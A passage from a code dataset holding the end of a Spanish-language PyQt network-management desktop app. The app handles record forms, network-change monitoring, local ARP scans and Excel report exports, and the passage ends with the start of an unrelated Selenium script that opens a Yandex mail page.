self.ui.SU_ADD.setStyleSheet(formato)\r\n\r\n self.ui.G_AgregarBtn.setEnabled(False)\r\n row_number=0\r\n for idx in self.ui.SalidaGestion.selectionModel().selectedIndexes():\r\n row_number = idx.row()\r\n aux=[]\r\n for i in range(0,self.ui.SalidaGestion.columnCount()):\r\n aux.append(self.ui.SalidaGestion.item(row_number,i).text())\r\n self.ID=str(aux[0])\r\n \r\n if self.indicador==\"PR\":\r\n self.ui.PR_DESC.setText(aux[1])\r\n self.ui.PR_FECHA.setText(aux[2])\r\n self.ui.PR_SOL.setText(aux[3])\r\n self.ui.PR_COR.clear()\r\n self.ui.PR_COR.addItem(aux[4])\r\n if aux[4]==\"No corregido\": self.ui.PR_COR.addItem(\"Corregido\")\r\n elif aux[4]==\"Corregido\": self.ui.PR_COR.addItem(\"No corregido\")\r\n else: \r\n self.ui.PR_COR.addItem(\"Corregido\")\r\n self.ui.PR_COR.addItem(\"No corregido\")\r\n self.ui.PR_FECHAC.setText(aux[5])\r\n self.comboDB(self.ui.PR_RED,f\"SELECT ID_RED FROM PROBLEMAS_RED WHERE ID_PROBLEMA={aux[0]}\",db.consultarRED(),aux[6])\r\n self.comboDB(self.ui.PR_DEP,f\"SELECT ID_DEPARTAMENTO FROM PROBLEMAS_RED WHERE ID_PROBLEMA={aux[0]}\",db.consultarDEPARTAMENTOS(),aux[7])\r\n \r\n elif self.indicador==\"R\":\r\n self.ui.R_Folio.setText(aux[1])\r\n self.ui.R_Descrip.setText(aux[2])\r\n self.ui.R_Fecha.setText(aux[3])\r\n self.ui.R_ACUDIO.clear()\r\n self.ui.R_ACUDIO.addItem(aux[4])\r\n if aux[4]==\"No acudio al sitio\": self.ui.R_ACUDIO.addItem(\"Acudio al sitio\")\r\n elif aux[4]==\"Acudio al sitio\": self.ui.R_ACUDIO.addItem(\"No acudio al sitio\")\r\n else: \r\n self.ui.R_ACUDIO.addItem(\"Acudio al sitio\")\r\n self.ui.R_ACUDIO.addItem(\"No acudio al sitio\")\r\n self.ui.R_REMOSIT.clear()\r\n self.ui.R_REMOSIT.addItem(aux[5])\r\n if aux[5]==\"Procedimiento de manera Remota\": self.ui.R_REMOSIT.addItem(\"Procedimientos en Sitio\")\r\n elif aux[5]==\"Procedimientos en Sitio\": self.ui.R_REMOSIT.addItem(\"Procedimiento de manera Remota\")\r\n else: \r\n self.ui.R_REMOSIT.addItem(\"Procedimiento de manera Remota\")\r\n self.ui.R_REMOSIT.addItem(\"Procedimientos en Sitio\")\r\n self.ui.R_MOT.setText(aux[6])\r\n self.ui.R_TEL.setText(aux[7])\r\n self.ui.R_ATEND.setText(aux[8])\r\n self.comboDB(self.ui.R_PROV,f\"SELECT ID_PROVEEDOR FROM REPORTES WHERE ID_REPORTE={aux[0]}\",db.consultarPROVEEDOR(),aux[9])\r\n elif self.indicador==\"I\":\r\n self.ui.I_ID.setText(aux[1])\r\n self.ui.I_NOM.setText(aux[2])\r\n self.ui.I_DESC.setText(aux[3])\r\n self.ui.I_UBI.setText(aux[4])\r\n self.ui.I_TC.clear()\r\n self.ui.I_TC.addItem(aux[5])\r\n if aux[5]==\"Inalámbrica\": \r\n self.ui.I_TC.addItem(\"Alambrica\")\r\n self.ui.I_TC.addItem(\"No Aplica\")\r\n elif aux[5]==\"Alambrica\": \r\n self.ui.I_TC.addItem(\"Inalámbrica\")\r\n self.ui.I_TC.addItem(\"No Aplica\")\r\n elif aux[5]==\"No aplica\": \r\n self.ui.I_TC.addItem(\"Alambrica\")\r\n self.ui.I_TC.addItem(\"Inalámbrica\")\r\n else: \r\n self.ui.I_TC.addItem(\"Alambrica\")\r\n self.ui.I_TC.addItem(\"Inalámbrica\")\r\n self.ui.I_TC.addItem(\"No Aplica\")\r\n self.comboDB(self.ui.I_RED,f\"SELECT ID_RED FROM DISPOSITIVOS WHERE ID_DISPOSITIVO={aux[0]}\",db.consultarRED(),aux[6])\r\n self.comboDB(self.ui.I_DEP,f\"SELECT ID_DEPARTAMENTO FROM DISPOSITIVOS WHERE ID_DISPOSITIVO={aux[0]}\",db.consultarDEPARTAMENTOS(),aux[7])\r\n elif self.indicador==\"P\":\r\n self.ui.P_N.setText(aux[1])\r\n self.ui.P_DES.setText(aux[2])\r\n self.ui.P_FECH.setText(aux[3])\r\n self.ui.P_TEL.setText(aux[4])\r\n self.comboDB(self.ui.P_TR,f\"SELECT ID_TRANSMISION FROM PROVEEDOR WHERE ID_PROVEEDOR={aux[0]}\",db.consultarTRANSMISION(),aux[5])\r\n elif self.indicador==\"RD\":\r\n self.ui.RD_S.setText(aux[1])\r\n self.ui.RD_PASS.setText(aux[2])\r\n self.ui.RD_SUB.setText(aux[3])\r\n self.ui.RD_DAJ.setText(aux[4])\r\n self.comboDB(self.ui.RD_PROV,f\"SELECT ID_PROVEEDOR FROM RED WHERE ID_RED={aux[0]}\",db.consultarPROVEEDOR(),aux[5])\r\n elif self.indicador==\"CR\":\r\n self.ui.CR_FECHA.setText(aux[1])\r\n self.comboDB(self.ui.CR_RED,f\"SELECT ID_RED FROM CONTROL_RED_ESPECIFICA WHERE ID_CONTROL_RED_ESPECIFICA={aux[0]}\",db.consultarRED(),aux[2])\r\n self.ui.CR_NOINV.setText(aux[3])\r\n self.ui.CR_STAT.clear()\r\n self.ui.CR_STAT.addItem(aux[4])\r\n if aux[4]==\"Libre\": self.ui.CR_STAT.addItem(\"Ocupado\")\r\n elif aux[4]==\"Ocupado\": self.ui.CR_STAT.addItem(\"Libre\")\r\n else: \r\n self.ui.CR_STAT.addItem(\"Libre\")\r\n self.ui.CR_STAT.addItem(\"Ocupado\")\r\n self.ui.CR_HOS.setText(aux[5])\r\n self.ui.CR_IP.setText(aux[6])\r\n self.ui.CR_VEND.setText(aux[7])\r\n self.ui.CR_MAC.setText(aux[8])\r\n self.ui.CR_RESP.setText(aux[9])\r\n self.ui.CR_OBS.setText(aux[10])\r\n self.ui.CR_VERFI.clear()\r\n self.ui.CR_VERFI.addItem(aux[11])\r\n if aux[11]==\"No verificado\": \r\n self.ui.CR_VERFI.addItem(\"No permitido\")\r\n self.ui.CR_VERFI.addItem(\"Verificado\")\r\n elif aux[11]==\"Verificado\": \r\n self.ui.CR_VERFI.addItem(\"No verificado\")\r\n self.ui.CR_VERFI.addItem(\"No permitido\")\r\n elif aux[11]==\"No permitido\": \r\n self.ui.CR_VERFI.addItem(\"Verificado\")\r\n self.ui.CR_VERFI.addItem(\"No verificado\")\r\n else: \r\n self.ui.CR_VERFI.addItem(\"No verificado\")\r\n self.ui.CR_VERFI.addItem(\"Verificado\")\r\n self.ui.CR_VERFI.addItem(\"No permitido\")\r\n self.ui.CR_TIP.clear()\r\n self.ui.CR_TIP.addItem(aux[12])\r\n if aux[12]==\"Móvil\": \r\n self.ui.CR_TIP.addItem(\"Laptop\")\r\n self.ui.CR_TIP.addItem(\"Escritorio\")\r\n elif aux[12]==\"Laptop\": \r\n self.ui.CR_TIP.addItem(\"Móvil\")\r\n self.ui.CR_TIP.addItem(\"Escritorio\")\r\n elif aux[12]==\"Escritorio\": \r\n self.ui.CR_TIP.addItem(\"Móvil\")\r\n self.ui.CR_TIP.addItem(\"Laptop\")\r\n else: \r\n self.ui.CR_TIP.addItem(\"Móvil\")\r\n self.ui.CR_TIP.addItem(\"Laptop\")\r\n self.ui.CR_TIP.addItem(\"Escritorio\")\r\n self.comboDB(self.ui.CR_DEP,f\"SELECT ID_DEPARTAMENTO FROM CONTROL_RED_ESPECIFICA WHERE ID_CONTROL_RED_ESPECIFICA={aux[0]}\",db.consultarDEPARTAMENTOS(),aux[13])\r\n\r\n elif self.indicador==\"U\":\r\n self.ui.SU_ID.setText(aux[0])\r\n self.ui.SU_NOM.setText(aux[1])\r\n self.ui.SU_CORD.setText(aux[2])\r\n self.ui.SU_SERV.clear()\r\n self.ui.SU_SERV.addItem(aux[3])\r\n if aux[3]==\"Sin Servicio\": self.ui.SU_SERV.addItem(\"Con Servicio\")\r\n elif aux[3]==\"Con Servicio\": self.ui.SU_SERV.addItem(\"Sin Servicio\")\r\n else: \r\n self.ui.SU_SERV.addItem(\"Con Servicio\")\r\n self.ui.SU_SERV.addItem(\"Sin Servicio\")\r\n self.ui.SU_PROVE.setText(aux[4])\r\n self.ui.SU_OBS.setText(aux[5])\r\n self.ui.SU_FECHA.setText(aux[6])\r\n self.ui.SU_TEL.setText(aux[7])\r\n self.comboDB(self.ui.SU_TR,f\"SELECT ID_TRANSMISION FROM UNIDADES_INTERNET WHERE ID_UNIDAD='{aux[0]}'\",db.consultarTRANSMISION(),aux[8])\r\n elif self.indicador==\"D\":\r\n self.ui.D_NOM.setText(aux[1])\r\n self.ui.D_DES.setText(aux[2])\r\n def limpiarCampos(self):\r\n if self.indicadorV==\"PR\":\r\n self.ui.PR_DESC.setText(\"\")\r\n self.ui.PR_FECHA.setText(\"\")\r\n self.ui.PR_SOL.setText(\"\")\r\n self.ui.PR_DEP.clear()\r\n self.ui.PR_COR.clear()\r\n self.ui.PR_COR.addItem(\"Corregido\")\r\n self.ui.PR_COR.addItem(\"No corregido\")\r\n self.ui.PR_FECHAC.setText(\"\")\r\n\r\n self.comboDBD(self.ui.PR_RED,db.consultarRED())\r\n self.comboDBD(self.ui.PR_DEP,db.consultarDEPARTAMENTOS())\r\n \r\n elif self.indicador==\"R\":\r\n self.ui.R_Folio.setText(\"\")\r\n self.ui.R_Descrip.setText(\"\")\r\n self.ui.R_Fecha.setText(\"\")\r\n self.ui.R_ACUDIO.clear()\r\n self.ui.R_ACUDIO.addItem(\"Acudio al sitio\")\r\n self.ui.R_ACUDIO.addItem(\"No acudio al sitio\")\r\n self.ui.R_REMOSIT.clear()\r\n self.ui.R_REMOSIT.addItem(\"Procedimiento de manera Remota\")\r\n self.ui.R_REMOSIT.addItem(\"Procedimientos en Sitio\")\r\n self.ui.R_MOT.setText(\"\")\r\n self.ui.R_TEL.setText(\"\")\r\n self.ui.R_ATEND.setText(\"\")\r\n self.comboDBD(self.ui.R_PROV,db.consultarPROVEEDOR())\r\n elif self.indicador==\"I\":\r\n self.ui.I_ID.setText(\"\")\r\n self.ui.I_NOM.setText(\"\")\r\n self.ui.I_DESC.setText(\"\")\r\n self.ui.I_UBI.setText(\"\")\r\n self.ui.I_TC.clear()\r\n self.ui.I_TC.addItem(\"Alambrica\")\r\n self.ui.I_TC.addItem(\"Inalámbrica\")\r\n self.ui.I_TC.addItem(\"No Aplica\")\r\n self.comboDBD(self.ui.I_RED,db.consultarRED())\r\n self.comboDBD(self.ui.I_DEP,db.consultarDEPARTAMENTOS())\r\n elif self.indicador==\"P\":\r\n self.ui.P_N.setText(\"\")\r\n self.ui.P_DES.setText(\"\")\r\n self.ui.P_FECH.setText(\"\")\r\n self.ui.P_TEL.setText(\"\")\r\n self.comboDBD(self.ui.P_TR,db.consultarTRANSMISION())\r\n elif self.indicador==\"RD\":\r\n self.ui.RD_S.setText(\"\")\r\n self.ui.RD_PASS.setText(\"\")\r\n self.ui.RD_SUB.setText(\"\")\r\n self.ui.RD_DAJ.setText(\"\")\r\n self.comboDBD(self.ui.RD_PROV,db.consultarPROVEEDOR())\r\n elif self.indicador==\"CR\":\r\n self.ui.CR_FECHA.setText(\"\")\r\n self.comboDBD(self.ui.CR_RED,db.consultarCONTROL_RED_ESPECIFICA())\r\n self.ui.CR_NOINV.setText(\"\")\r\n self.ui.CR_STAT.clear()\r\n self.ui.CR_VERFI.addItem(\"No verificado\")\r\n self.ui.CR_VERFI.addItem(\"Verificado\")\r\n self.ui.CR_VERFI.addItem(\"No permitido\")\r\n self.ui.CR_HOS.setText(\"\")\r\n self.ui.CR_IP.setText(\"\")\r\n self.ui.CR_VEND.setText(\"\")\r\n self.ui.CR_MAC.setText(\"\")\r\n self.ui.CR_RESP.setText(\"\")\r\n self.ui.CR_OBS.setText(\"\")\r\n self.ui.CR_TIP.clear()\r\n self.ui.CR_TIP.addItem(\"Móvil\")\r\n self.ui.CR_TIP.addItem(\"Laptop\")\r\n self.ui.CR_TIP.addItem(\"Escritorio\")\r\n\r\n elif self.indicador==\"U\":\r\n self.ui.SU_ID.setText(\"\")\r\n self.ui.SU_NOM.setText(\"\")\r\n self.ui.SU_CORD.setText(\"\")\r\n self.ui.SU_SERV.clear()\r\n self.ui.SU_SERV.addItem(\"Con Servicio\")\r\n self.ui.SU_SERV.addItem(\"Sin Servicio\")\r\n self.ui.SU_PROVE.setText(\"\")\r\n self.ui.SU_OBS.setText(\"\")\r\n self.ui.SU_FECHA.setText(\"\")\r\n self.ui.SU_TEL.setText(\"\")\r\n self.comboDBD(self.ui.SU_TR,db.consultarTRANSMISION())\r\n elif self.indicador==\"D\":\r\n self.ui.D_NOM.setText(\"\")\r\n self.ui.D_DES.setText(\"\")\r\n def comboDB(self,combo,consulta,dep,val):\r\n combo.clear()\r\n a=db.consultar(consulta)\r\n combo.addItem(str(a[0][0])+\":\"+val)\r\n for i in dep: \r\n if str(a[0][0])+\":\"+val!=str(i[0])+\":\"+i[1]:\r\n combo.addItem(str(i[0])+\":\"+i[1])\r\n def comboDBD(self,combo,dep):\r\n combo.clear()\r\n for i in dep: combo.addItem(str(i[0])+\":\"+i[1])\r\n def Filtrar(self):\r\n self.Filtrado=self.ui.GFiltrado.text()\r\n if self.Filtrado==\"\" or self.Filtrado.replace(\" \",\"\").replace(\"\\t\",\"\")==\"\":\r\n self.Filtrado=\"*_*_*\"\r\n if self.indicador==\"PR\": self.DBproblemasRed()\r\n elif self.indicador==\"R\": self.DBreportes()\r\n elif self.indicador==\"I\": self.DBinvernario()\r\n elif self.indicador==\"P\": self.DBProveedores()\r\n elif self.indicador==\"RD\": self.DBRedes()\r\n elif self.indicador==\"C\": self.DBConexiones()\r\n elif self.indicador==\"H\": self.DBHosts()\r\n elif self.indicador==\"CR\": self.DBControlRed()\r\n elif self.indicador==\"U\": self.DBUnidades()\r\n elif self.indicador==\"D\": self.DBDepartamentos()\r\n def redesR(self):\r\n redes= sb.run([\"netsh\", \"wlan\", \"show\",\"profile\"], capture_output=True, text=True).stdout\r\n ls=redes.split(\"\\n\")\r\n redes=[]\r\n for i in ls:\r\n if \":\" in i and \"actual\" not in i and \"current\" not in i:\r\n aux=i.split(\":\")[1]\r\n if aux!=\"\":\r\n redes.append(aux.strip())\r\n return redes\r\n def CambiosRed(self):\r\n while self.inf.SALIR!=True:\r\n SSID=rs.obtener_SSID(self.inf.INTERFAZ)\r\n INTER=rs.Obtener_Dispositivos(False)\r\n auxIP=\"\"\r\n for dis in INTER:\r\n if dis[0]==self.inf.INTERFAZ:\r\n auxIP=dis[3]\r\n self.inf.auxGate=dis[5] \r\n break\r\n if SSID==\"SIN CONEXION\" or (self.inf.auxGate==\"--\" or self.inf.auxGate==\"\"):\r\n print(\"[i] No hay conexión en la interfaz \"+self.inf.INTERFAZ)\r\n self.inf.SSID=\"SIN CONEXION\"\r\n self.inf.CONEXION=False\r\n self.inf.IPV4=\"--\"\r\n self.inf.GATEWAY=\"--\"\r\n self.ui.UserBtn.setText(\"\")\r\n self.ui.label_5.setText(f\"

Red: {self.inf.SSID}      IPv4: {self.inf.IPV4}      Gateway: {self.inf.GATEWAY}

\")\r\n self.actualizarDatosDash()\r\n self.inf.CAMBIOS=False\r\n self.ui.SpeedRed.setText(self.inf.SSID)\r\n else:\r\n if SSID=='NO TIENE' and \"ETHER\" in self.inf.INTERFAZ.upper():\r\n if self.inf.auxGate != self.inf.GATEWAY:\r\n print(\"[!] Cambios en red. (Cableada)\")\r\n self.inf.CAMBIOS=True\r\n self.inf.IPV4=auxIP\r\n self.inf.GATEWAY=self.inf.auxGate \r\n try:\r\n SSID=str(socket.getfqdn(self.inf.GATEWAY))\r\n if SSID==self.inf.GATEWAY:\r\n try:\r\n SSID=str(rs.get_mac_details(rs.escanearARP_U(self.inf.GATEWAY,self.inf.INTERFAZ,3,False)[1]))\r\n except:\r\n SSID=self.inf.GATEWAY\r\n except:\r\n try:\r\n SSID=str(rs.get_mac_details(rs.escanearARP_U(self.inf.GATEWAY,self.inf.INTERFAZ,3,False)[1]))\r\n except:\r\n SSID=self.inf.GATEWAY \r\n self.inf.SSID=SSID\r\n self.inf.CONEXION=True\r\n aux=db.consultarRED()\r\n encontrado=False\r\n for i in aux:\r\n if i[1]==self.inf.SSID:\r\n encontrado=True\r\n if encontrado==False and self.inf.SSID!='POR DEFECTO' and self.inf.SSID!='SIN CONEXION':\r\n db.insertarRED(self.inf.SSID,\"Pendiente\",0,0,1)\r\n self.ui.label_5.setText(f\"

Red: {self.inf.SSID}      IPv4: {self.inf.IPV4}      Gateway: {self.inf.GATEWAY}

\")\r\n self.actualizarDatosDash()\r\n self.ui.UserBtn.setText(\"\")\r\n self.inf.CAMBIOS=False\r\n self.ui.SpeedRed.setText(self.inf.SSID)\r\n self.tab.emit(1)\r\n elif self.inf.SSID!=SSID and SSID != \"NO TIENE\":\r\n print(\"[!] Cambios en red. (Inalambrica)\")\r\n self.inf.CAMBIOS=True\r\n self.inf.IPV4=auxIP\r\n self.inf.GATEWAY=self.inf.auxGate \r\n self.inf.SSID=SSID\r\n self.inf.CONEXION=True\r\n self.ui.UserBtn.setText(\"\")\r\n sleep(1)\r\n aux=db.consultarRED()\r\n encontrado=False\r\n for i in aux:\r\n if i[1]==self.inf.SSID:\r\n encontrado=True\r\n if encontrado==False and self.inf.SSID!='POR DEFECTO' and self.inf.SSID in self.redesR():\r\n db.insertarRED(self.inf.SSID,\"Pendiente\",0,0,1)\r\n self.ui.label_5.setText(f\"

Red: {self.inf.SSID}      IPv4: {self.inf.IPV4}      Gateway: {self.inf.GATEWAY}

\")\r\n self.actualizarDatosDash()\r\n self.inf.CAMBIOS=False\r\n self.ui.SpeedRed.setText(self.inf.SSID)\r\n self.tab.emit(1)\r\n sleep(1)\r\n def RGeneral(self):\r\n archivo=\"Gtmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Redes\"\r\n hoja.append(('ID','SSID','CONTRASEÑA','SUBIDA','BAJADA','PROVEEDOR'))\r\n consulta=db.consultarRED()\r\n for i in consulta:\r\n hoja.append(i)\r\n hoja1=wb.create_sheet(\"Pruebas\")\r\n hoja1.append(('ID','FECHA','HORA','HOST','SPONSOR','RED','SUBIDA','BAJADA','LATENCIA(S)','LATENCIA(B)','PING','RESULTADO'))\r\n consulta=db.consultarPRUEBAS_VELOCIDAD()\r\n for i in consulta:\r\n hoja1.append(i)\r\n hoja2=wb.create_sheet(\"Reportes\")\r\n hoja2.append(('ID','FOLIO','DESCRIPCION','FECHA','ACUDIO','REMOTO/SITIO','MOTIVO','TELEFONO','ATENDIO','PROVEEDOR'))\r\n consulta=db.consultarREPORTES()\r\n for i in consulta:\r\n hoja2.append(i)\r\n hoja3=wb.create_sheet(\"Unidades Internet\")\r\n hoja3.append(('ID','NOMBRE','COORDINACION','CON INTENERT','PROVEEDOR','OBSERVACIONES','FECHA','TELEFONO','TIPO TRANSMISIÓN'))\r\n consulta=db.consultarUNIDADES_INTERNET()\r\n for i in consulta:\r\n hoja3.append(i)\r\n hoja4=wb.create_sheet(\"Control de red\")\r\n hoja4.append(('ID','FECHA','SSID','NO. INVENTARIO','ESTADO','HOST','IPV4','VENDOR','MAC','USUARIO','OBSERVACIONES','VERIFICADO','TIPO','DEPARTAMENTO'))\r\n consulta=db.consultarCONTROL_RED_ESPECIFICA()\r\n for i in consulta:\r\n hoja4.append(i)\r\n hoja5=wb.create_sheet(\"Numero de conexiones\")\r\n hoja5.append(('ID','SSID','FECHA','CONEXIONES'))\r\n consulta=db.consultarHISTORIAL_NUM_CONEXIONES()\r\n for i in consulta:\r\n hoja5.append(i)\r\n hoja6=wb.create_sheet(\"Historial de dispositivos\")\r\n hoja6.append(('ID','FECHA','SSID','HOST','IPV4','MAC','VENDOR'))\r\n consulta=db.consultarHISTORIAL_CONEXIONES()\r\n for i in consulta:\r\n hoja6.append(i)\r\n hoja7=wb.create_sheet(\"Proveedores\")\r\n hoja7.append(('ID','NOMBRE','DESCRIPCION','FECHA','TELEFONO','TIPO'))\r\n consulta=db.consultarPROVEEDOR()\r\n for i in consulta:\r\n hoja7.append(i)\r\n hoja8=wb.create_sheet(\"Inventario\")\r\n hoja8.append(('ID','NO.INVENTARIO','NOMBRE','DESCRIPCION','UBICACION','TIPO','RED','DEPARTAMENTO'))\r\n consulta=db.consultarDISPOSITIVOS()\r\n for i in consulta:\r\n hoja8.append(i)\r\n hoja9=wb.create_sheet(\"Departamentos\")\r\n hoja9.append(('ID','NOMBRE','DESCRIPCION'))\r\n consulta=db.consultarDEPARTAMENTOS()\r\n for i in consulta:\r\n hoja9.append(i)\r\n hoja10=wb.create_sheet(\"Problemas red\")\r\n hoja10.append(('ID','Descripción','Fecha','Solución','Corregido','Fecha corrección','Red','Departamento'))\r\n consulta=db.consultarPROBLEMAS_RED()\r\n for i in consulta:\r\n hoja10.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RVelocidad(self):\r\n archivo=\"Vtmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Pruebas\"\r\n hoja.append(('ID','FECHA','HORA','HOST','SPONSOR','RED','SUBIDA','BAJADA','LATENCIA(S)','LATENCIA(B)','PING','RESULTADO'))\r\n consulta=db.consultarPRUEBAS_VELOCIDAD()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RServicio(self):\r\n archivo=\"Stmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Reportes\"\r\n hoja.append(('ID','FOLIO','DESCRIPCION','FECHA','ACUDIO','REMOTO/SITIO','MOTIVO','TELEFONO','ATENDIO','PROVEEDOR'))\r\n consulta=db.consultarREPORTES()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RClues(self):\r\n archivo=\"Ctmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Unidades con Internet\"\r\n hoja.append(('ID','NOMBRE','CORD','CON INTENERT','PROVEEDOR','OBSERVACIONES','FECHA','TELEFONO','TIPO TRANSMISIÓN'))\r\n consulta=db.consultarUNIDADES_INTERNET()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RDisp(self):\r\n archivo=\"CRtmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"HOST\"\r\n hoja.append(('ID','FECHA','SSID','NO. INVENTARIO','ESTADO','HOST','IPV4','VENDOR','MAC','USUARIO','OBSERVACIONES','VERIFICADO','TIPO','DEPARTAMENTO'))\r\n consulta=db.consultarCONTROL_RED_ESPECIFICA()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RHistorial(self):\r\n archivo=\"Htmp.xlsx\"\r\n wb = Workbook()\r\n hoja1=wb.active\r\n hoja1.title=\"Numero de conexiones\"\r\n hoja1.append(('ID','SSID','FECHA','CONEXIONES'))\r\n consulta=db.consultarHISTORIAL_NUM_CONEXIONES()\r\n for i in consulta:\r\n hoja1.append(i)\r\n hoja2=wb.create_sheet(\"Historial de dispositivos\")\r\n hoja2.append(('ID','FECHA','SSID','HOST','IPV4','MAC','VENDOR'))\r\n consulta=db.consultarHISTORIAL_CONEXIONES()\r\n for i in consulta:\r\n hoja2.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RProveedores(self):\r\n archivo=\"Ptmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Proveedores\"\r\n hoja.append(('ID','NOMBRE','DESCRIPCION','FECHA','TELEFONO','TIPO'))\r\n consulta=db.consultarPROVEEDOR()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RInventario(self):\r\n archivo=\"Itmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Inventario\"\r\n hoja.append(('ID','NO.INVENTARIO','NOMBRE','DESCRIPCION','UBICACION','TIPO','RED','DEPARTAMENTO'))\r\n consulta=db.consultarDISPOSITIVOS()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RProblemas(self):\r\n archivo=\"PRtmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Problemas\"\r\n hoja.append(('ID','Descripción','Fecha','Solución','Corregido','Fecha corrección','Red','Departamento'))\r\n consulta=db.consultarPROBLEMAS_RED()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def BRHistorial(self):\r\n db.ejecutarAccion(\"DELETE FROM HISTORIAL_NUM_CONEXIONES\")\r\n db.ejecutarAccion(\"DELETE FROM HISTORIAL_CONEXIONES\")\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Base de Datos\",\"Se ha borrado el historial de red.\"])\r\n self.mostrarErrores()\r\n def BRServicio(self):\r\n db.ejecutarAccion(\"DELETE FROM REPORTES\")\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Base de Datos\",\"Se ha borrado los reportes de servicio.\"])\r\n def BRPruebas(self):\r\n db.ejecutarAccion(\"DELETE FROM PRUEBAS_VELOCIDAD\")\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Base de Datos\",\"Se ha borrado las pruebas de red.\"])\r\n def BRProblemas(self):\r\n db.ejecutarAccion(\"DELETE FROM PROBLEMAS_RED\")\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Base de Datos\",\"Se ha borrado los problemas de red.\"])\r\n def VMac(self):\r\n redes= sb.run([\"getmac\"], capture_output=True, text=True).stdout\r\n self.ui.SalidaVar.setHtml(str(redes.replace(\"\\n\",\"
\")))\r\n def VARP(self):\r\n A,disp,ips=rs.escanearARP(self.inf.GATEWAY+\"/24\",self.inf.INTERFAZ)\r\n ARP=\"\"\r\n ARP+=\"Respuesta a solicitudes ARP
\"\r\n for i in disp:\r\n ARP+=i[0]+\"   \"+i[1]+\"
\"\r\n self.ui.SalidaVar.setHtml(ARP)\r\n def speedtest(self):\r\n WebOpen('https://www.speedtest.net/')\r\n def fast(self):\r\n WebOpen('https://fast.com/es/')\r\n def MRed(self):\r\n os.system(\"start ncpa.cpl\")\r\n def MTareas(self):\r\n os.system(\"start taskmgr\")\r\n def RCompartidos(self):\r\n WebOpen(self.inf.GATEWAY)\r\n def cmd(self):\r\n os.system(\"start cmd\")\r\n def errores(self):\r\n Widget=QWidget()\r\n aux=QVBoxLayout()\r\n if len(self.inf.Errores)>0:\r\n for i in self.inf.Errores:\r\n auxWid=QFrame()\r\n auxW=QGridLayout()\r\n label=QLabel()\r\n pixmap = QPixmap('Imagenes/ALERT.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n auxW.addWidget(label,0,0)\r\n auxW.addWidget(QLabel(i[0]),0,1)\r\n auxW.addWidget(QLabel(i[1]),0,2)\r\n auxW.addWidget(QLabel(i[2]),0,3)\r\n auxWid.setLayout(auxW)\r\n aux.addWidget(auxWid)\r\n else:\r\n auxWid=QFrame()\r\n auxW=QGridLayout()\r\n label=QLabel()\r\n pixmap = QPixmap('Imagenes/CORRECTO.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n auxW.addWidget(label,0,0)\r\n auxW.addWidget(QLabel(\"No hay nada nuevo que informar.\"),0,1)\r\n auxWid.setLayout(auxW)\r\n aux.addWidget(auxWid)\r\n Widget.setLayout(aux)\r\n self.ui.NotificacionesW.setWidget(Widget)\r\n def SignalAlerta(self):\r\n self.Alerta()\r\n def mostrarErrores(self):\r\n if len(self.inf.Errores)>0:\r\n self.SignalA.emit(1)\r\n def BorrarNo(self):\r\n self.inf.Errores=[]\r\n Widget=QWidget()\r\n aux=QVBoxLayout()\r\n auxWid=QFrame()\r\n auxW=QGridLayout()\r\n label=QLabel()\r\n pixmap = QPixmap('Imagenes/CORRECTO.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n auxW.addWidget(label,0,0)\r\n auxW.addWidget(QLabel(\"No hay nada nuevo que informar.\"),0,1)\r\n auxWid.setLayout(auxW)\r\n aux.addWidget(auxWid)\r\n Widget.setLayout(aux)\r\n self.ui.NotificacionesW.setWidget(Widget)\r\n Widget.setLayout(aux)\r\n self.ui.NotificacionesW.setWidget(Widget)\r\n \r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n window = MainWindow()\r\n window.show()\r\n\r\n sys.exit(app.exec())","repo_name":"JulioPonceCamacho/SystemToManageNetwork","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":142850,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72016559849","text":"import time\n\nfrom selenium import webdriver\nfrom selenium.common import NoSuchElementException\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\n\noptions = Options()\noptions.add_experimental_option('excludeSwitches', ['enable-automation'])\n\ndriver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\ndriver.maximize_window()\n# driver.get(\"https://mail.yandex.com/\")\ndriver.get(\"https://mail360.yandex.com/premium-plans?from=mail_landing\")\ndriver.implicitly_wait(10)\ntry:\n button = driver.find_element(by=By.XPATH, value='/html/body/div/div[2]/div/div[3]/section[1]/div/a[2]')\n print(f'button:{button}')\n 